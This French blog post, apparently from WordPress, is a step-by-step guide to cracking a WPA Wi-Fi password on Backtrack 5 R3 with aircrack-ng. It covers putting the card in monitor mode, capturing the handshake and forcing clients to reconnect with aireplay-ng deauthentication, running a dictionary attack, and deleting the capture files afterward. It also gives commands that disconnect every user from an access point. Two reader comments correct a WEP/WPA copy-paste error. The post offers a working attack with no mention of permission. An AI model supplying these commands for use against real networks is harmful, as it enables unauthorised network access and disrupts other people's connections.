[Backtrack 5 R3] Aircrack-ng Crack WPA Avec Dico

1.Initialisez la carte wlan0

Sauvegardez raz dans « root »
(wlan0 par default,changez sinon le fichier raz)

Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi

airodump-ng mon0

3.Capturer le handshake

airodump-ng -c 6 -w capture — encrypt wpa mon0
aireplay-ng -0 1 -e ESSID mon0

4.Crack avec Dico
aircrack-ng -w dico.txt *.cap

5.Supprimer les fichiers .cap .xor etc…
Sauvegardez rm dans « root »

Dans un terminal tapez:
bash rm

Autre façon pour forcer l’utilisateur à se déconnecter:
aireplay-ng -0 0 -a AP_MAC -c CLIENT_MAC mon0
aireplay-ng -0 0 -a AP_MAC mon0

Enjoy !

5 commentaires sur “[Backtrack 5 R3] Aircrack-ng Crack WPA Avec Dico

Ajouter un commentaire

  1. bon du coup 😉

    je reprends:

    [Backtrack 5 R3] Crack WPA Avec Dico

    Aircrack-ng
    CRACK WPA Avec Dico

    1.Intialisez la carte wlan0
    Sauvegardez raz dans « root »
    (wlan0 par default,changez sinon le fichier raz)
    Dans un terminal tapez:
    bash raz

    2.Analysez les réseaux wifi
    airodump-ng mon0

    3.Capturer le handshake
    airodump-ng -c 6 -w capture — encrypt wep mon0
    aireplay-ng -0 1 -e ESSID mon0

    4.Crack avec Dico
    aircrack-ng -w dico.txt *.cap

    5.Supprimer les fichiers .cap .xor etc…
    Sauvegardez rm dans « root »
    Dans un terminal tapez:
    bash rm

    tu indique craquer une clef WPA ok 😉 mais en 3. quand tu veux cap le handshake dans ta ligne de commande tu mets un WEP
    et c'est exactement la meme ligne que dans le tuto du WEP 😉

    ensuite tu mets aussi le canal 6 dans le tuto d'apres tu précises bien qu'il faut le changer mais bon… des fois que… certains s’arrêtent de lire trop tot les tutos !

    J'aime

  2. Ha oui comme ça je préfère 🙂

    Effectivement j'avais fait un copier/coller car les commandes se ressemblent,et oui le wpa est passé a la trappe,c'est maintenant corrigé,merci ! 🙂

    J'aime

Laisser un commentaire

Créez un site ou un blog sur WordPress.com

Retour en haut ↑

